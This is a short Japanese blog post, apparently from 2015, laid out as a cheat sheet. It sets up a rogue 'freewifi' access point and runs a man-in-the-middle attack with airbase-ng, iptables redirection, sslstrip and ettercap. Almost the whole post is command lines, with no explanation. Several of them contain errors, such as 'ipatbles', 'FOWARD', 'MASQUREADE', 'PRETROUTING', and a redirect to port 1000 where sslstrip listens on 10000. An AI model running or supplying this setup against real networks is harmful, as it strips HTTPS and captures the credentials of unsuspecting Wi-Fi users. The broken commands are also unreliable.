Pyclas on Security

pyclas@xmpp.cm (OTR)

sslstrip,ettercapを用いた偽アクセスポイントのman in the middle attackチートシート

キャプションは帰ってきてから書きます。

  • VMware,Visualbox,VisualMachineを利用してる際はネットワーク設定をブリッジ接続に変更 
  • route - n
  • apt-get install dhcp3-server
  • leafpad /etc/dhcpd.conf

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.0.0 netmask 255.255.255.0 {

option routers 192.168.0.0;

option subnetm-mask 255.255.255.0;

option domain-name "freewifi";

option domain-name-server 192.168.0.0;

range 192.168.0.2 192.168.0.40;

}

  • airmon-ng start wlan0
  • airbase-ng -c 11 -e freewifi mon0
  • ifconfig at0 192.168.0.1 netmask 255.255.255.0
  • ifconfig at0 mtu 1400
  • route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
  • echo  1 > /proc/sys/net/ipv4.ip_foward
  • iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1
  • ipatbles -P FOWARD ACCEPT
  • iptables --append FORWARD --in-interface at0 -j ACCEPT
  • iptables --tables nat --append POSTROUTING --out-interface eth0 -j MASQUREADE
  • iptables -t nat -A PRETROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
  • dhcp -cf /etc/dhpd.conf -pf /var/run/dhcp.pid at0
  • /etc/init.d/isc-dhcp/isc-dhcp-server start
  • sslstrip -f -p -k 10000
  • ettercap -p -u -T -q -i at0

f:id:pyclas:20150731062010j:plain

巷ではこのようなものも販売されているようです。

www.wifipineapple.com